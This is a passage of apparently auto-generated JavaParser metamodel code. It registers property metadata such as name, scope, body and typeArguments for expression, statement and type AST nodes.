enclosedExprMetaModel.getDeclaredPropertyMetaModels().add(enclosedExprMetaModel.innerPropertyMetaModel);
fieldAccessExprMetaModel.namePropertyMetaModel = new PropertyMetaModel(fieldAccessExprMetaModel, "name", com.github.javaparser.ast.expr.SimpleName.class, Optional.of(simpleNameMetaModel), false, false, false, false, false);
fieldAccessExprMetaModel.getDeclaredPropertyMetaModels().add(fieldAccessExprMetaModel.namePropertyMetaModel);
fieldAccessExprMetaModel.scopePropertyMetaModel = new PropertyMetaModel(fieldAccessExprMetaModel, "scope", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), true, false, false, false, false);
fieldAccessExprMetaModel.getDeclaredPropertyMetaModels().add(fieldAccessExprMetaModel.scopePropertyMetaModel);
fieldAccessExprMetaModel.typeArgumentsPropertyMetaModel = new PropertyMetaModel(fieldAccessExprMetaModel, "typeArguments", com.github.javaparser.ast.type.Type.class, Optional.of(typeMetaModel), true, false, true, false, false);
fieldAccessExprMetaModel.getDeclaredPropertyMetaModels().add(fieldAccessExprMetaModel.typeArgumentsPropertyMetaModel);
fieldAccessExprMetaModel.usingDiamondOperatorPropertyMetaModel = new PropertyMetaModel(fieldAccessExprMetaModel, "usingDiamondOperator", boolean.class, Optional.empty(), false, false, false, false, false);
fieldAccessExprMetaModel.getDerivedPropertyMetaModels().add(fieldAccessExprMetaModel.usingDiamondOperatorPropertyMetaModel);
instanceOfExprMetaModel.expressionPropertyMetaModel = new PropertyMetaModel(instanceOfExprMetaModel, "expression", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
instanceOfExprMetaModel.getDeclaredPropertyMetaModels().add(instanceOfExprMetaModel.expressionPropertyMetaModel);
instanceOfExprMetaModel.typePropertyMetaModel = new PropertyMetaModel(instanceOfExprMetaModel, "type", com.github.javaparser.ast.type.ReferenceType.class, Optional.of(referenceTypeMetaModel), false, false, false, false, true);
instanceOfExprMetaModel.getDeclaredPropertyMetaModels().add(instanceOfExprMetaModel.typePropertyMetaModel);
lambdaExprMetaModel.bodyPropertyMetaModel = new PropertyMetaModel(lambdaExprMetaModel, "body", com.github.javaparser.ast.stmt.Statement.class, Optional.of(statementMetaModel), false, false, false, false, false);
lambdaExprMetaModel.getDeclaredPropertyMetaModels().add(lambdaExprMetaModel.bodyPropertyMetaModel);
lambdaExprMetaModel.isEnclosingParametersPropertyMetaModel = new PropertyMetaModel(lambdaExprMetaModel, "isEnclosingParameters", boolean.class, Optional.empty(), false, false, false, false, false);
lambdaExprMetaModel.getDeclaredPropertyMetaModels().add(lambdaExprMetaModel.isEnclosingParametersPropertyMetaModel);
lambdaExprMetaModel.parametersPropertyMetaModel = new PropertyMetaModel(lambdaExprMetaModel, "parameters", com.github.javaparser.ast.body.Parameter.class, Optional.of(parameterMetaModel), false, false, true, false, false);
lambdaExprMetaModel.getDeclaredPropertyMetaModels().add(lambdaExprMetaModel.parametersPropertyMetaModel);
lambdaExprMetaModel.expressionBodyPropertyMetaModel = new PropertyMetaModel(lambdaExprMetaModel, "expressionBody", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), true, false, false, false, false);
lambdaExprMetaModel.getDerivedPropertyMetaModels().add(lambdaExprMetaModel.expressionBodyPropertyMetaModel);
memberValuePairMetaModel.namePropertyMetaModel = new PropertyMetaModel(memberValuePairMetaModel, "name", com.github.javaparser.ast.expr.SimpleName.class, Optional.of(simpleNameMetaModel), false, false, false, false, false);
memberValuePairMetaModel.getDeclaredPropertyMetaModels().add(memberValuePairMetaModel.namePropertyMetaModel);
memberValuePairMetaModel.valuePropertyMetaModel = new PropertyMetaModel(memberValuePairMetaModel, "value", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
memberValuePairMetaModel.getDeclaredPropertyMetaModels().add(memberValuePairMetaModel.valuePropertyMetaModel);
methodCallExprMetaModel.argumentsPropertyMetaModel = new PropertyMetaModel(methodCallExprMetaModel, "arguments", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, true, false, false);
methodCallExprMetaModel.getDeclaredPropertyMetaModels().add(methodCallExprMetaModel.argumentsPropertyMetaModel);
methodCallExprMetaModel.namePropertyMetaModel = new PropertyMetaModel(methodCallExprMetaModel, "name", com.github.javaparser.ast.expr.SimpleName.class, Optional.of(simpleNameMetaModel), false, false, false, false, false);
methodCallExprMetaModel.getDeclaredPropertyMetaModels().add(methodCallExprMetaModel.namePropertyMetaModel);
methodCallExprMetaModel.scopePropertyMetaModel = new PropertyMetaModel(methodCallExprMetaModel, "scope", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), true, false, false, false, false);
methodCallExprMetaModel.getDeclaredPropertyMetaModels().add(methodCallExprMetaModel.scopePropertyMetaModel);
methodCallExprMetaModel.typeArgumentsPropertyMetaModel = new PropertyMetaModel(methodCallExprMetaModel, "typeArguments", com.github.javaparser.ast.type.Type.class, Optional.of(typeMetaModel), true, false, true, false, false);
methodCallExprMetaModel.getDeclaredPropertyMetaModels().add(methodCallExprMetaModel.typeArgumentsPropertyMetaModel);
methodCallExprMetaModel.usingDiamondOperatorPropertyMetaModel = new PropertyMetaModel(methodCallExprMetaModel, "usingDiamondOperator", boolean.class, Optional.empty(), false, false, false, false, false);
methodCallExprMetaModel.getDerivedPropertyMetaModels().add(methodCallExprMetaModel.usingDiamondOperatorPropertyMetaModel);
methodReferenceExprMetaModel.identifierPropertyMetaModel = new PropertyMetaModel(methodReferenceExprMetaModel, "identifier", java.lang.String.class, Optional.empty(), false, true, false, false, false);
methodReferenceExprMetaModel.getDeclaredPropertyMetaModels().add(methodReferenceExprMetaModel.identifierPropertyMetaModel);
methodReferenceExprMetaModel.scopePropertyMetaModel = new PropertyMetaModel(methodReferenceExprMetaModel, "scope", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
methodReferenceExprMetaModel.getDeclaredPropertyMetaModels().add(methodReferenceExprMetaModel.scopePropertyMetaModel);
methodReferenceExprMetaModel.typeArgumentsPropertyMetaModel = new PropertyMetaModel(methodReferenceExprMetaModel, "typeArguments", com.github.javaparser.ast.type.Type.class, Optional.of(typeMetaModel), true, false, true, false, false);
methodReferenceExprMetaModel.getDeclaredPropertyMetaModels().add(methodReferenceExprMetaModel.typeArgumentsPropertyMetaModel);
methodReferenceExprMetaModel.usingDiamondOperatorPropertyMetaModel = new PropertyMetaModel(methodReferenceExprMetaModel, "usingDiamondOperator", boolean.class, Optional.empty(), false, false, false, false, false);
methodReferenceExprMetaModel.getDerivedPropertyMetaModels().add(methodReferenceExprMetaModel.usingDiamondOperatorPropertyMetaModel);
nameExprMetaModel.namePropertyMetaModel = new PropertyMetaModel(nameExprMetaModel, "name", com.github.javaparser.ast.expr.SimpleName.class, Optional.of(simpleNameMetaModel), false, false, false, false, false);
nameExprMetaModel.getDeclaredPropertyMetaModels().add(nameExprMetaModel.namePropertyMetaModel);
nameMetaModel.annotationsPropertyMetaModel = new PropertyMetaModel(nameMetaModel, "annotations", com.github.javaparser.ast.expr.AnnotationExpr.class, Optional.of(annotationExprMetaModel), false, false, true, false, false);
nameMetaModel.getDeclaredPropertyMetaModels().add(nameMetaModel.annotationsPropertyMetaModel);
nameMetaModel.identifierPropertyMetaModel = new PropertyMetaModel(nameMetaModel, "identifier", java.lang.String.class, Optional.empty(), false, true, false, false, false);
nameMetaModel.getDeclaredPropertyMetaModels().add(nameMetaModel.identifierPropertyMetaModel);
nameMetaModel.qualifierPropertyMetaModel = new PropertyMetaModel(nameMetaModel, "qualifier", com.github.javaparser.ast.expr.Name.class, Optional.of(nameMetaModel), true, false, false, false, false);
nameMetaModel.getDeclaredPropertyMetaModels().add(nameMetaModel.qualifierPropertyMetaModel);
normalAnnotationExprMetaModel.pairsPropertyMetaModel = new PropertyMetaModel(normalAnnotationExprMetaModel, "pairs", com.github.javaparser.ast.expr.MemberValuePair.class, Optional.of(memberValuePairMetaModel), false, false, true, false, false);
normalAnnotationExprMetaModel.getDeclaredPropertyMetaModels().add(normalAnnotationExprMetaModel.pairsPropertyMetaModel);
objectCreationExprMetaModel.anonymousClassBodyPropertyMetaModel = new PropertyMetaModel(objectCreationExprMetaModel, "anonymousClassBody", com.github.javaparser.ast.body.BodyDeclaration.class, Optional.of(bodyDeclarationMetaModel), true, false, true, false, true);
objectCreationExprMetaModel.getDeclaredPropertyMetaModels().add(objectCreationExprMetaModel.anonymousClassBodyPropertyMetaModel);
objectCreationExprMetaModel.argumentsPropertyMetaModel = new PropertyMetaModel(objectCreationExprMetaModel, "arguments", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, true, false, false);
objectCreationExprMetaModel.getDeclaredPropertyMetaModels().add(objectCreationExprMetaModel.argumentsPropertyMetaModel);
objectCreationExprMetaModel.scopePropertyMetaModel = new PropertyMetaModel(objectCreationExprMetaModel, "scope", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), true, false, false, false, false);
objectCreationExprMetaModel.getDeclaredPropertyMetaModels().add(objectCreationExprMetaModel.scopePropertyMetaModel);
objectCreationExprMetaModel.typePropertyMetaModel = new PropertyMetaModel(objectCreationExprMetaModel, "type", com.github.javaparser.ast.type.ClassOrInterfaceType.class, Optional.of(classOrInterfaceTypeMetaModel), false, false, false, false, false);
objectCreationExprMetaModel.getDeclaredPropertyMetaModels().add(objectCreationExprMetaModel.typePropertyMetaModel);
objectCreationExprMetaModel.typeArgumentsPropertyMetaModel = new PropertyMetaModel(objectCreationExprMetaModel, "typeArguments", com.github.javaparser.ast.type.Type.class, Optional.of(typeMetaModel), true, false, true, false, false);
objectCreationExprMetaModel.getDeclaredPropertyMetaModels().add(objectCreationExprMetaModel.typeArgumentsPropertyMetaModel);
objectCreationExprMetaModel.usingDiamondOperatorPropertyMetaModel = new PropertyMetaModel(objectCreationExprMetaModel, "usingDiamondOperator", boolean.class, Optional.empty(), false, false, false, false, false);
objectCreationExprMetaModel.getDerivedPropertyMetaModels().add(objectCreationExprMetaModel.usingDiamondOperatorPropertyMetaModel);
simpleNameMetaModel.identifierPropertyMetaModel = new PropertyMetaModel(simpleNameMetaModel, "identifier", java.lang.String.class, Optional.empty(), false, true, false, false, false);
simpleNameMetaModel.getDeclaredPropertyMetaModels().add(simpleNameMetaModel.identifierPropertyMetaModel);
singleMemberAnnotationExprMetaModel.memberValuePropertyMetaModel = new PropertyMetaModel(singleMemberAnnotationExprMetaModel, "memberValue", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
singleMemberAnnotationExprMetaModel.getDeclaredPropertyMetaModels().add(singleMemberAnnotationExprMetaModel.memberValuePropertyMetaModel);
superExprMetaModel.classExprPropertyMetaModel = new PropertyMetaModel(superExprMetaModel, "classExpr", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), true, false, false, false, false);
superExprMetaModel.getDeclaredPropertyMetaModels().add(superExprMetaModel.classExprPropertyMetaModel);
thisExprMetaModel.classExprPropertyMetaModel = new PropertyMetaModel(thisExprMetaModel, "classExpr", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), true, false, false, false, false);
thisExprMetaModel.getDeclaredPropertyMetaModels().add(thisExprMetaModel.classExprPropertyMetaModel);
typeExprMetaModel.typePropertyMetaModel = new PropertyMetaModel(typeExprMetaModel, "type", com.github.javaparser.ast.type.Type.class, Optional.of(typeMetaModel), false, false, false, false, false);
typeExprMetaModel.getDeclaredPropertyMetaModels().add(typeExprMetaModel.typePropertyMetaModel);
unaryExprMetaModel.expressionPropertyMetaModel = new PropertyMetaModel(unaryExprMetaModel, "expression", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
unaryExprMetaModel.getDeclaredPropertyMetaModels().add(unaryExprMetaModel.expressionPropertyMetaModel);
unaryExprMetaModel.operatorPropertyMetaModel = new PropertyMetaModel(unaryExprMetaModel, "operator", com.github.javaparser.ast.expr.UnaryExpr.Operator.class, Optional.empty(), false, false, false, false, false);
unaryExprMetaModel.getDeclaredPropertyMetaModels().add(unaryExprMetaModel.operatorPropertyMetaModel);
unaryExprMetaModel.postfixPropertyMetaModel = new PropertyMetaModel(unaryExprMetaModel, "postfix", boolean.class, Optional.empty(), false, false, false, false, false);
unaryExprMetaModel.getDerivedPropertyMetaModels().add(unaryExprMetaModel.postfixPropertyMetaModel);
unaryExprMetaModel.prefixPropertyMetaModel = new PropertyMetaModel(unaryExprMetaModel, "prefix", boolean.class, Optional.empty(), false, false, false, false, false);
unaryExprMetaModel.getDerivedPropertyMetaModels().add(unaryExprMetaModel.prefixPropertyMetaModel);
variableDeclarationExprMetaModel.annotationsPropertyMetaModel = new PropertyMetaModel(variableDeclarationExprMetaModel, "annotations", com.github.javaparser.ast.expr.AnnotationExpr.class, Optional.of(annotationExprMetaModel), false, false, true, false, false);
variableDeclarationExprMetaModel.getDeclaredPropertyMetaModels().add(variableDeclarationExprMetaModel.annotationsPropertyMetaModel);
variableDeclarationExprMetaModel.modifiersPropertyMetaModel = new PropertyMetaModel(variableDeclarationExprMetaModel, "modifiers", com.github.javaparser.ast.Modifier.class, Optional.empty(), false, false, false, true, false);
variableDeclarationExprMetaModel.getDeclaredPropertyMetaModels().add(variableDeclarationExprMetaModel.modifiersPropertyMetaModel);
variableDeclarationExprMetaModel.variablesPropertyMetaModel = new PropertyMetaModel(variableDeclarationExprMetaModel, "variables", com.github.javaparser.ast.body.VariableDeclarator.class, Optional.of(variableDeclaratorMetaModel), false, true, true, false, false);
variableDeclarationExprMetaModel.getDeclaredPropertyMetaModels().add(variableDeclarationExprMetaModel.variablesPropertyMetaModel);
variableDeclarationExprMetaModel.maximumCommonTypePropertyMetaModel = new PropertyMetaModel(variableDeclarationExprMetaModel, "maximumCommonType", com.github.javaparser.ast.type.Type.class, Optional.of(typeMetaModel), false, false, false, false, false);
variableDeclarationExprMetaModel.getDerivedPropertyMetaModels().add(variableDeclarationExprMetaModel.maximumCommonTypePropertyMetaModel);
importDeclarationMetaModel.isAsteriskPropertyMetaModel = new PropertyMetaModel(importDeclarationMetaModel, "isAsterisk", boolean.class, Optional.empty(), false, false, false, false, false);
importDeclarationMetaModel.getDeclaredPropertyMetaModels().add(importDeclarationMetaModel.isAsteriskPropertyMetaModel);
importDeclarationMetaModel.isStaticPropertyMetaModel = new PropertyMetaModel(importDeclarationMetaModel, "isStatic", boolean.class, Optional.empty(), false, false, false, false, false);
importDeclarationMetaModel.getDeclaredPropertyMetaModels().add(importDeclarationMetaModel.isStaticPropertyMetaModel);
importDeclarationMetaModel.namePropertyMetaModel = new PropertyMetaModel(importDeclarationMetaModel, "name", com.github.javaparser.ast.expr.Name.class, Optional.of(nameMetaModel), false, false, false, false, false);
importDeclarationMetaModel.getDeclaredPropertyMetaModels().add(importDeclarationMetaModel.namePropertyMetaModel);
assertStmtMetaModel.checkPropertyMetaModel = new PropertyMetaModel(assertStmtMetaModel, "check", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
assertStmtMetaModel.getDeclaredPropertyMetaModels().add(assertStmtMetaModel.checkPropertyMetaModel);
assertStmtMetaModel.messagePropertyMetaModel = new PropertyMetaModel(assertStmtMetaModel, "message", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), true, false, false, false, false);
assertStmtMetaModel.getDeclaredPropertyMetaModels().add(assertStmtMetaModel.messagePropertyMetaModel);
blockStmtMetaModel.statementsPropertyMetaModel = new PropertyMetaModel(blockStmtMetaModel, "statements", com.github.javaparser.ast.stmt.Statement.class, Optional.of(statementMetaModel), false, false, true, false, false);
blockStmtMetaModel.getDeclaredPropertyMetaModels().add(blockStmtMetaModel.statementsPropertyMetaModel);
breakStmtMetaModel.labelPropertyMetaModel = new PropertyMetaModel(breakStmtMetaModel, "label", com.github.javaparser.ast.expr.SimpleName.class, Optional.of(simpleNameMetaModel), true, false, false, false, false);
breakStmtMetaModel.getDeclaredPropertyMetaModels().add(breakStmtMetaModel.labelPropertyMetaModel);
catchClauseMetaModel.bodyPropertyMetaModel = new PropertyMetaModel(catchClauseMetaModel, "body", com.github.javaparser.ast.stmt.BlockStmt.class, Optional.of(blockStmtMetaModel), false, false, false, false, false);
catchClauseMetaModel.getDeclaredPropertyMetaModels().add(catchClauseMetaModel.bodyPropertyMetaModel);
catchClauseMetaModel.parameterPropertyMetaModel = new PropertyMetaModel(catchClauseMetaModel, "parameter", com.github.javaparser.ast.body.Parameter.class, Optional.of(parameterMetaModel), false, false, false, false, false);
catchClauseMetaModel.getDeclaredPropertyMetaModels().add(catchClauseMetaModel.parameterPropertyMetaModel);
continueStmtMetaModel.labelPropertyMetaModel = new PropertyMetaModel(continueStmtMetaModel, "label", com.github.javaparser.ast.expr.SimpleName.class, Optional.of(simpleNameMetaModel), true, false, false, false, false);
continueStmtMetaModel.getDeclaredPropertyMetaModels().add(continueStmtMetaModel.labelPropertyMetaModel);
doStmtMetaModel.bodyPropertyMetaModel = new PropertyMetaModel(doStmtMetaModel, "body", com.github.javaparser.ast.stmt.Statement.class, Optional.of(statementMetaModel), false, false, false, false, false);
doStmtMetaModel.getDeclaredPropertyMetaModels().add(doStmtMetaModel.bodyPropertyMetaModel);
doStmtMetaModel.conditionPropertyMetaModel = new PropertyMetaModel(doStmtMetaModel, "condition", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
doStmtMetaModel.getDeclaredPropertyMetaModels().add(doStmtMetaModel.conditionPropertyMetaModel);
explicitConstructorInvocationStmtMetaModel.argumentsPropertyMetaModel = new PropertyMetaModel(explicitConstructorInvocationStmtMetaModel, "arguments", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, true, false, false);
explicitConstructorInvocationStmtMetaModel.getDeclaredPropertyMetaModels().add(explicitConstructorInvocationStmtMetaModel.argumentsPropertyMetaModel);
explicitConstructorInvocationStmtMetaModel.expressionPropertyMetaModel = new PropertyMetaModel(explicitConstructorInvocationStmtMetaModel, "expression", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), true, false, false, false, false);
explicitConstructorInvocationStmtMetaModel.getDeclaredPropertyMetaModels().add(explicitConstructorInvocationStmtMetaModel.expressionPropertyMetaModel);
explicitConstructorInvocationStmtMetaModel.isThisPropertyMetaModel = new PropertyMetaModel(explicitConstructorInvocationStmtMetaModel, "isThis", boolean.class, Optional.empty(), false, false, false, false, false);
explicitConstructorInvocationStmtMetaModel.getDeclaredPropertyMetaModels().add(explicitConstructorInvocationStmtMetaModel.isThisPropertyMetaModel);
explicitConstructorInvocationStmtMetaModel.typeArgumentsPropertyMetaModel = new PropertyMetaModel(explicitConstructorInvocationStmtMetaModel, "typeArguments", com.github.javaparser.ast.type.Type.class, Optional.of(typeMetaModel), true, false, true, false, false);
explicitConstructorInvocationStmtMetaModel.getDeclaredPropertyMetaModels().add(explicitConstructorInvocationStmtMetaModel.typeArgumentsPropertyMetaModel);
explicitConstructorInvocationStmtMetaModel.usingDiamondOperatorPropertyMetaModel = new PropertyMetaModel(explicitConstructorInvocationStmtMetaModel, "usingDiamondOperator", boolean.class, Optional.empty(), false, false, false, false, false);
explicitConstructorInvocationStmtMetaModel.getDerivedPropertyMetaModels().add(explicitConstructorInvocationStmtMetaModel.usingDiamondOperatorPropertyMetaModel);
expressionStmtMetaModel.expressionPropertyMetaModel = new PropertyMetaModel(expressionStmtMetaModel, "expression", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
expressionStmtMetaModel.getDeclaredPropertyMetaModels().add(expressionStmtMetaModel.expressionPropertyMetaModel);
foreachStmtMetaModel.bodyPropertyMetaModel = new PropertyMetaModel(foreachStmtMetaModel, "body", com.github.javaparser.ast.stmt.Statement.class, Optional.of(statementMetaModel), false, false, false, false, false);
foreachStmtMetaModel.getDeclaredPropertyMetaModels().add(foreachStmtMetaModel.bodyPropertyMetaModel);
foreachStmtMetaModel.iterablePropertyMetaModel = new PropertyMetaModel(foreachStmtMetaModel, "iterable", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
foreachStmtMetaModel.getDeclaredPropertyMetaModels().add(foreachStmtMetaModel.iterablePropertyMetaModel);
foreachStmtMetaModel.variablePropertyMetaModel = new PropertyMetaModel(foreachStmtMetaModel, "variable", com.github.javaparser.ast.expr.VariableDeclarationExpr.class, Optional.of(variableDeclarationExprMetaModel), false, false, false, false, false);
foreachStmtMetaModel.getDeclaredPropertyMetaModels().add(foreachStmtMetaModel.variablePropertyMetaModel);
forStmtMetaModel.bodyPropertyMetaModel = new PropertyMetaModel(forStmtMetaModel, "body", com.github.javaparser.ast.stmt.Statement.class, Optional.of(statementMetaModel), false, false, false, false, false);
forStmtMetaModel.getDeclaredPropertyMetaModels().add(forStmtMetaModel.bodyPropertyMetaModel);
forStmtMetaModel.comparePropertyMetaModel = new PropertyMetaModel(forStmtMetaModel, "compare", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), true, false, false, false, false);
forStmtMetaModel.getDeclaredPropertyMetaModels().add(forStmtMetaModel.comparePropertyMetaModel);
forStmtMetaModel.initializationPropertyMetaModel = new PropertyMetaModel(forStmtMetaModel, "initialization", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, true, false, false);
forStmtMetaModel.getDeclaredPropertyMetaModels().add(forStmtMetaModel.initializationPropertyMetaModel);
forStmtMetaModel.updatePropertyMetaModel = new PropertyMetaModel(forStmtMetaModel, "update", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, true, false, false);
forStmtMetaModel.getDeclaredPropertyMetaModels().add(forStmtMetaModel.updatePropertyMetaModel);
ifStmtMetaModel.conditionPropertyMetaModel = new PropertyMetaModel(ifStmtMetaModel, "condition", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
ifStmtMetaModel.getDeclaredPropertyMetaModels().add(ifStmtMetaModel.conditionPropertyMetaModel);
ifStmtMetaModel.elseStmtPropertyMetaModel = new PropertyMetaModel(ifStmtMetaModel, "elseStmt", com.github.javaparser.ast.stmt.Statement.class, Optional.of(statementMetaModel), true, false, false, false, false);
ifStmtMetaModel.getDeclaredPropertyMetaModels().add(ifStmtMetaModel.elseStmtPropertyMetaModel);
ifStmtMetaModel.thenStmtPropertyMetaModel = new PropertyMetaModel(ifStmtMetaModel, "thenStmt", com.github.javaparser.ast.stmt.Statement.class, Optional.of(statementMetaModel), false, false, false, false, false);
ifStmtMetaModel.getDeclaredPropertyMetaModels().add(ifStmtMetaModel.thenStmtPropertyMetaModel);
ifStmtMetaModel.elseBlockPropertyMetaModel = new PropertyMetaModel(ifStmtMetaModel, "elseBlock", boolean.class, Optional.empty(), false, false, false, false, false);
ifStmtMetaModel.getDerivedPropertyMetaModels().add(ifStmtMetaModel.elseBlockPropertyMetaModel);
ifStmtMetaModel.thenBlockPropertyMetaModel = new PropertyMetaModel(ifStmtMetaModel, "thenBlock", boolean.class, Optional.empty(), false, false, false, false, false);
ifStmtMetaModel.getDerivedPropertyMetaModels().add(ifStmtMetaModel.thenBlockPropertyMetaModel);
labeledStmtMetaModel.labelPropertyMetaModel = new PropertyMetaModel(labeledStmtMetaModel, "label", com.github.javaparser.ast.expr.SimpleName.class, Optional.of(simpleNameMetaModel), false, false, false, false, false);
labeledStmtMetaModel.getDeclaredPropertyMetaModels().add(labeledStmtMetaModel.labelPropertyMetaModel);
labeledStmtMetaModel.statementPropertyMetaModel = new PropertyMetaModel(labeledStmtMetaModel, "statement", com.github.javaparser.ast.stmt.Statement.class, Optional.of(statementMetaModel), false, false, false, false, false);
labeledStmtMetaModel.getDeclaredPropertyMetaModels().add(labeledStmtMetaModel.statementPropertyMetaModel);
returnStmtMetaModel.expressionPropertyMetaModel = new PropertyMetaModel(returnStmtMetaModel, "expression", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), true, false, false, false, false);
returnStmtMetaModel.getDeclaredPropertyMetaModels().add(returnStmtMetaModel.expressionPropertyMetaModel);
switchEntryStmtMetaModel.labelPropertyMetaModel = new PropertyMetaModel(switchEntryStmtMetaModel, "label", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), true, false, false, false, false);
switchEntryStmtMetaModel.getDeclaredPropertyMetaModels().add(switchEntryStmtMetaModel.labelPropertyMetaModel);
switchEntryStmtMetaModel.statementsPropertyMetaModel = new PropertyMetaModel(switchEntryStmtMetaModel, "statements", com.github.javaparser.ast.stmt.Statement.class, Optional.of(statementMetaModel), false, false, true, false, false);
switchEntryStmtMetaModel.getDeclaredPropertyMetaModels().add(switchEntryStmtMetaModel.statementsPropertyMetaModel);
switchStmtMetaModel.entriesPropertyMetaModel = new PropertyMetaModel(switchStmtMetaModel, "entries", com.github.javaparser.ast.stmt.SwitchEntryStmt.class, Optional.of(switchEntryStmtMetaModel), false, false, true, false, false);
switchStmtMetaModel.getDeclaredPropertyMetaModels().add(switchStmtMetaModel.entriesPropertyMetaModel);
switchStmtMetaModel.selectorPropertyMetaModel = new PropertyMetaModel(switchStmtMetaModel, "selector", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
switchStmtMetaModel.getDeclaredPropertyMetaModels().add(switchStmtMetaModel.selectorPropertyMetaModel);
synchronizedStmtMetaModel.bodyPropertyMetaModel = new PropertyMetaModel(synchronizedStmtMetaModel, "body", com.github.javaparser.ast.stmt.BlockStmt.class, Optional.of(blockStmtMetaModel), false, false, false, false, false);
synchronizedStmtMetaModel.getDeclaredPropertyMetaModels().add(synchronizedStmtMetaModel.bodyPropertyMetaModel);
synchronizedStmtMetaModel.expressionPropertyMetaModel = new PropertyMetaModel(synchronizedStmtMetaModel, "expression", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
synchronizedStmtMetaModel.getDeclaredPropertyMetaModels().add(synchronizedStmtMetaModel.expressionPropertyMetaModel);
throwStmtMetaModel.expressionPropertyMetaModel = new PropertyMetaModel(throwStmtMetaModel, "expression", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
throwStmtMetaModel.getDeclaredPropertyMetaModels().add(throwStmtMetaModel.expressionPropertyMetaModel);
tryStmtMetaModel.catchClausesPropertyMetaModel = new PropertyMetaModel(tryStmtMetaModel, "catchClauses", com.github.javaparser.ast.stmt.CatchClause.class, Optional.of(catchClauseMetaModel), false, false, true, false, false);
tryStmtMetaModel.getDeclaredPropertyMetaModels().add(tryStmtMetaModel.catchClausesPropertyMetaModel);
tryStmtMetaModel.finallyBlockPropertyMetaModel = new PropertyMetaModel(tryStmtMetaModel, "finallyBlock", com.github.javaparser.ast.stmt.BlockStmt.class, Optional.of(blockStmtMetaModel), true, false, false, false, false);
tryStmtMetaModel.getDeclaredPropertyMetaModels().add(tryStmtMetaModel.finallyBlockPropertyMetaModel);
tryStmtMetaModel.resourcesPropertyMetaModel = new PropertyMetaModel(tryStmtMetaModel, "resources", com.github.javaparser.ast.expr.VariableDeclarationExpr.class, Optional.of(variableDeclarationExprMetaModel), false, false, true, false, false);
tryStmtMetaModel.getDeclaredPropertyMetaModels().add(tryStmtMetaModel.resourcesPropertyMetaModel);
tryStmtMetaModel.tryBlockPropertyMetaModel = new PropertyMetaModel(tryStmtMetaModel, "tryBlock", com.github.javaparser.ast.stmt.BlockStmt.class, Optional.of(blockStmtMetaModel), true, false, false, false, false);
tryStmtMetaModel.getDeclaredPropertyMetaModels().add(tryStmtMetaModel.tryBlockPropertyMetaModel);
localClassDeclarationStmtMetaModel.classDeclarationPropertyMetaModel = new PropertyMetaModel(localClassDeclarationStmtMetaModel, "classDeclaration", com.github.javaparser.ast.body.ClassOrInterfaceDeclaration.class, Optional.of(classOrInterfaceDeclarationMetaModel), false, false, false, false, false);
localClassDeclarationStmtMetaModel.getDeclaredPropertyMetaModels().add(localClassDeclarationStmtMetaModel.classDeclarationPropertyMetaModel);
whileStmtMetaModel.bodyPropertyMetaModel = new PropertyMetaModel(whileStmtMetaModel, "body", com.github.javaparser.ast.stmt.Statement.class, Optional.of(statementMetaModel), false, false, false, false, false);
whileStmtMetaModel.getDeclaredPropertyMetaModels().add(whileStmtMetaModel.bodyPropertyMetaModel);
whileStmtMetaModel.conditionPropertyMetaModel = new PropertyMetaModel(whileStmtMetaModel, "condition", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
whileStmtMetaModel.getDeclaredPropertyMetaModels().add(whileStmtMetaModel.conditionPropertyMetaModel);
arrayTypeMetaModel.componentTypePropertyMetaModel = new PropertyMetaModel(arrayTypeMetaModel, "componentType", com.github.javaparser.ast.type.Type.class, Optional.of(typeMetaModel), false, false, false, false, false);
arrayTypeMetaModel.getDeclaredPropertyMetaModels().add(arrayTypeMetaModel.componentTypePropertyMetaModel);
classOrInterfaceTypeMetaModel.namePropertyMetaModel = new PropertyMetaModel(classOrInterfaceTypeMetaModel, "name", com.github.javaparser.ast.expr.SimpleName.class, Optional.of(simpleNameMetaModel), false, false, false, false, false);
classOrInterfaceTypeMetaModel.getDeclaredPropertyMetaModels().add(classOrInterfaceTypeMetaModel.namePropertyMetaModel);
classOrInterfaceTypeMetaModel.scopePropertyMetaModel = new PropertyMetaModel(classOrInterfaceTypeMetaModel, "scope", com.github.javaparser.ast.type.ClassOrInterfaceType.class, Optional.of(classOrInterfaceTypeMetaModel), true, false, false, false, false);
